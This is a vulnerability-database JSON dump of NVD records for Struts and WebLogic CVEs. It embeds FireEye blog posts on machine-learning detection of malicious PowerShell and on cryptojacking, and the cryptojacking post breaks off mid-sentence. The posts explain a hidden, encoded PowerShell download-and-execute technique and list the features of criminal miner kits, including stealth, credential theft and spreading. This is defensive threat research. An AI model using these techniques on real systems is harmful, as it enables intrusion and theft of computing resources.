"cpe:/a:apache:struts:2.3.27", "cpe:/a:apache:struts:2.3.29", "cpe:/a:apache:struts:2.3.10", "cpe:/a:apache:struts:2.3.26", "cpe:/a:apache:struts:2.3.22", "cpe:/a:apache:struts:2.3.20.2", "cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.3.21", "cpe:/a:apache:struts:2.3.17", "cpe:/a:apache:struts:2.3.6", "cpe:/a:apache:struts:2.3.28", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.3.5", "cpe:/a:apache:struts:2.3.16.1", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.3.24", "cpe:/a:apache:struts:2.5.9", "cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.3.13", "cpe:/a:apache:struts:2.5.8", "cpe:/a:apache:struts:2.3.20", "cpe:/a:apache:struts:2.3.20.3", "cpe:/a:apache:struts:2.5.6", "cpe:/a:apache:struts:2.3.9", "cpe:/a:apache:struts:2.5.10", "cpe:/a:apache:struts:2.3.16.2", "cpe:/a:apache:struts:2.3.31", "cpe:/a:apache:struts:2.3.15.1", "cpe:/a:apache:struts:2.3.28.1", "cpe:/a:apache:struts:2.3.19", "cpe:/a:apache:struts:2.3.11", "cpe:/a:apache:struts:2.3.16", "cpe:/a:apache:struts:2.5.2", "cpe:/a:apache:struts:2.5.5", "cpe:/a:apache:struts:2.5.3", "cpe:/a:apache:struts:2.3.15.3", "cpe:/a:apache:struts:2.5.7", "cpe:/a:apache:struts:2.3.16.3", "cpe:/a:apache:struts:2.3.25", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.3.23", "cpe:/a:apache:struts:2.5.1", "cpe:/a:apache:struts:2.5", "cpe:/a:apache:struts:2.3.30", "cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.3.20.1", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.3.24.1"], "id": "CVE-2017-5638", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.10:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T15:47:57", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-26T19:29:00", "type": "cve", "title": "CVE-2019-2725", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-04-27T16:39:00", "cpe": ["cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:storagetek_tape_analytics_sw_tool:2.3", "cpe:/a:oracle:vm_virtualbox:5.2.36", "cpe:/a:oracle:communications_converged_application_server:7.0", "cpe:/a:oracle:tape_virtual_storage_manager_gui:6.2", "cpe:/a:oracle:agile_plm:9.3.5", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:communications_converged_application_server:7.1", "cpe:/a:oracle:tape_library_acsls:8.5", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.58", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.57", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.56", "cpe:/a:oracle:agile_plm:9.3.3", "cpe:/a:oracle:agile_plm:9.3.4", "cpe:/a:oracle:communications_converged_application_server:5.1"], "id": "CVE-2019-2725", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-2725", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:communications_converged_application_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:5.2.36:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_virtual_storage_manager_gui:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*"]}], "fireeye": [{"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction****\n\nCyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to [install backdoors](<https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html>), [execute malicious code](<https://www.csoonline.com/article/3227046/malware/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html>), and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.\n\nIn this post you will learn:\n\n * Why malicious PowerShell can be challenging to detect with a traditional \u201csignature-based\u201d or \u201crule-based\u201d detection engine.\n * How Natural Language Processing (NLP) can be applied to tackle this challenge.\n * How our NLP model detects malicious PowerShell commands, even if obfuscated.\n * The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.\n\n#### Background****\n\nPowerShell is one of the most [popular tools](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).\n\n \nFigure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 \u2013 blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series\n\nFireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the [tactics, techniques and procedures (TTPs) used in PowerShell attacks](<https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf>), as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to [improve PowerShell logging](<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>), which gives greater visibility into potential attacker activity. More recently, our in-depth report on [APT32](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.\n\n \nFigure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain\n\nLet\u2019s take a deep dive into an example of a malicious PowerShell command (Figure 3).\n\n \nFigure 3: Example of a malicious PowerShell command\n\nThe following is a quick explanation of the [arguments](<https://docs.microsoft.com/en-us/powershell/scripting/powershell-scripting?view=powershell-6>):\n\n * -NoProfile \u2013 indicates that the current user\u2019s profile setup script should not be executed when the PowerShell engine starts.\n * -NonI \u2013 shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.\n * -W Hidden \u2013 shorthand for \u201c-WindowStyle Hidden\u201d, which indicates that the PowerShell session window should be started in a hidden manner.\n * -Exec Bypass \u2013 shorthand for \u201c-ExecutionPolicy Bypass\u201d, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn\u2019t meant to be a security boundary.\n * -encodedcommand \u2013 indicates the following chunk of text is a base64 encoded command.\n\nWhat is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.\n\n \nFigure 4: The decoded command for the aforementioned example\n\nInterestingly, the decoded command unveils a stealthy fileless network access and remote content execution!\n\n * _IEX_ is an alias for the _Invoke-Expression_ cmdlet that will execute the command provided on the local machine.\n * **The _new-object_** cmdlet creates an instance of a .NET Framework or COM object, here a _net.webclient_ object.\n * The _downloadstring_ will download the contents from &lt;url&gt; into a memory buffer (which in turn _IEX_ will execute).\n\nIt\u2019s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting [CVE-2017-10271 to deliver a cryptocurrency miner](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>). This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.\n\nThere are several reasons why adversaries prefer PowerShell:\n\n 1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.\n 2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.\n 3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.\n\nAdditionally, from an economics perspective:\n\n * Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with [open source obfuscation tools](<https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html>).\n * Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.\n\nNext, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.\n\n#### Natural Language Processing for Detecting Malicious PowerShell****\n\nCan we use machine learning to predict if a PowerShell command is malicious?\n\nOne advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.\n\nAfter we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.\n\nOne of the technical challenges we tackled was** **synonym, a problem studied in linguistics. For instance, \u201cNOL\u201d, \u201cNOLO\u201d, and \u201cNOLOGO\u201d have identical semantics in PowerShell syntax. In NLP, a [stemming](<https://en.wikipedia.org/wiki/Stemming>) algorithm will reduce the word to its original form, such as \u201cInnovating\u201d being stemmed to \u201cInnovate\u201d.\n\nWe created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as [trie](<https://en.wikipedia.org/wiki/Trie>), as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.\n\n \nFigure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)\n\nThe overall NLP pipeline we developed is captured in the following table:\n\nNLP Key Modules\n\n| \n\nFunctionality \n \n---|--- \n \nDecoder\n\n| \n\nDetect and decode any encoded text \n \nNamed Entity Recognition (NER)\n\n| \n\nDetect and recognize any entities such as IP, URL, Email, Registry key, etc. \n \nTokenizer\n\n| \n\nTokenize the PowerShell command into a list of tokens \n \nStemmer\n\n| \n\nStem tokens into semantically identical token, uses trie \n \nVocabulary Vectorizer\n\n| \n\nVectorize the list of tokens into machine learning friendly format \n \nSupervised classifier\n\n| \n\nBinary classification algorithms:\n\n * Kernel Support Vector Machine\n * Gradient Boosted Trees\n * Deep Neural Networks \n \nReasoning\n\n| \n\nThe explanation of why the prediction was made. Enables analysts to validate predications. \n \nThe following are the key steps when streaming the aforementioned example through the NLP pipeline:\n\n * Detect and decode the Base64 commands, if any\n * Recognize entities using Named Entity Recognition (NER), such as the &lt;URL&gt;\n * Tokenize the entire text, including both clear text and obfuscated commands\n * Stem each token, and vectorize them based on the vocabulary\n * Predict the malicious probability using the supervised learning model\n\n \nFigure 6: NLP pipeline that predicts the malicious probability of a PowerShell command\n\nMore importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.\n\n \nFigure 7: End-to-end machine learning production pipeline for PowerShell machine learning\n\n#### Value Validated in the Field****\n\nWe successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:\n\n * Commodity malware such as Kovter.\n * Red team penetration test activities.\n * New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.\n\nThe unique values brought by the PowerShell machine learning detection engine include: \n\n * The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.\n * The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.\n\nThe ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.\n\n#### Acknowledgements\n\nWe would like to acknowledge:\n\n * Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.\n * Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.\n * Research endpoint support from Caleb Madrigal.\n * The FireEye ICE-DS Team.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-10T12:00:00", "type": "fireeye", "title": "Malicious PowerShell Detection via Machine Learning", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-07-10T12:00:00", "id": "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "href": "https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction\n\nCyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This [interest has increased in recent years](<https://www.fireeye.com/blog/threat-research/2018/04/cryptocurrencies-cyber-crime-blockchain-infrastructure-use.html>), stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.\n\nThis blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.\n\n#### What Is Mining?\n\nAs transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into \"blocks\" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the \"chain\" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called \"pools\" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.\n\n \nFigure 1: The role of miners\n\n#### Underground Interest\n\nFireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.\n\n \nFigure 2: Underground keyword mentions\n\n#### Monero Is King\n\nThe majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called \"ring signatures,\" which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.\n\nThe Monero blockchain also uses what's called a \"memory-hard\" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.\n\n#### Underground Advertisements for Miners\n\nBecause most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.\n\n**XMR Mining Utilities** \n \n--- \n \nXMR-STACK \n \nMINERGATE \n \nXMRMINER \n \nCCMINER \n \nXMRIG \n \nCLAYMORE \n \nSGMINER \n \nCAST XMR \n \nLUKMINER \n \nCPUMINER-MULTI \n \nTable 1: Commonly used Monero miner utilities\n\nThe following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.\n\n##### Sample Advertisement #1 (Smart Miner + Builder)\n\nIn early April 2018, actor \"Mon\u00a3y\" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD \u2013 payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero \u2013 that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:\n\n * Unlimited builds\n * Builder GUI (Figure 4)\n * Written in AutoIT (no dependencies)\n * FUD\n * Safer error handling\n * Uses most recent XMRig code\n * Customizable pool/port\n * Packed with UPX\n * Works on all Windows OS (32- and 64-bit)\n * Madness Mode option\n\n \nFigure 3: Monero Madness\n\n \nFigure 4: Monero Madness builder\n\n##### Sample Advertisement #2 (Miner + Telegram Bot Builder)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"kent9876\" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:\n\n * Written in C/C++\n * Build size is small (about 100\u2013150 kB)\n * Hides miner process from popular task managers\n * Can run without Administrator privileges (user-mode)\n * Auto-update ability\n * All data encoded with 256-bit key\n * Access to Telegram bot-builder\n * Lifetime support (24/7) via Telegram\n\n \nFigure 5: Goldig Miner advertisement\n\n##### Sample Advertisement #3 (Miner + Credential Stealer)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"TH3FR3D\" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:\n\n * Written in C# (Version 1.0.1.0)\n * Browser stealer for all major browsers (cookies, saved passwords, auto-fill)\n * Monero miner (uses minergate.com pool by default, but can be configured)\n * Filezilla stealer\n * Desktop file grabber (.txt and more)\n * Can download and execute files\n * Update ability\n * USB spreader functionality\n * PHP web panel\n\n \nFigure 6: Felix HTTP\n\n##### Sample Advertisement #4 (Miner + RAT)\n\nIn January 2018, FireEye iSIGHT Intelligence observed actor \"ups\" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the [CVE-2016-0099](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032>) exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for \u20ac200 EUR, or \u20ac325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:\n\n_Windows Build Specifics_\n\n * Written in C++ (no dependencies)\n * Miner component based on XMRig\n * Easy cryptor and VPS hosting options\n * Web panel (Figure 7)\n * Uses TLS for secured communication\n * Download and execute\n * Auto-update ability\n * Cleanup routine\n * Receive remote commands\n * Perform privilege escalation\n * Features \"game mode\" (mining stops if user plays game)\n * Proxy feature (based on XMRig)\n * Support (for \u20ac20/month)\n * Kills other miners from list\n * Hidden from TaskManager\n * Configurable pool, coin, and wallet (via panel)\n * Can mine the following Cryptonight-based coins:\n * Monero\n * Bytecoin\n * Electroneum\n * DigitalNote\n * Karbowanec\n * Sumokoin\n * Fantomcoin\n * Dinastycoin\n * Dashcoin\n * LeviarCoin\n * BipCoin\n * QuazarCoin\n * Bitcedi\n\n_Linux Build Specifics_\n\n * Issues running on Linux servers (higher performance on desktop OS)\n * Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)\n\n \nFigure 7: Miner bot web panel\n\n##### Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)\n\nIn August 2017, actor \"MeatyBanana\" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:\n\n * Configurable miner pool and port (default to minergate)\n * Compatible with both 64- and 86-bit Windows OS\n * Hides from the following popular task managers:\n * Windows Task Manager\n * Process Killer\n * KillProcess\n * System Explorer\n * Process Explorer\n * AnVir\n * Process Hacker\n * Masked as a system driver\n * Does not require administrator privileges\n * No dependencies\n * Registry persistence mechanism\n * Ability to perform \"tasks\" (download and execute files, navigate to a site, and perform DDoS)\n * USB spreader\n * Support after purchase\n\n#### The Cost of Cryptojacking\n\nThe presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:\n\n 1. Degradation in system performance\n 2. Increased cost in electricity\n 3. Potential exposure of security holes\n\nCryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.\n\nIn the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.\n\nThe electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.\n\nCryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as [TRITON](<https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html>).\n\n#### Cryptocurrency Miner Distribution Techniques\n\nIn order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via 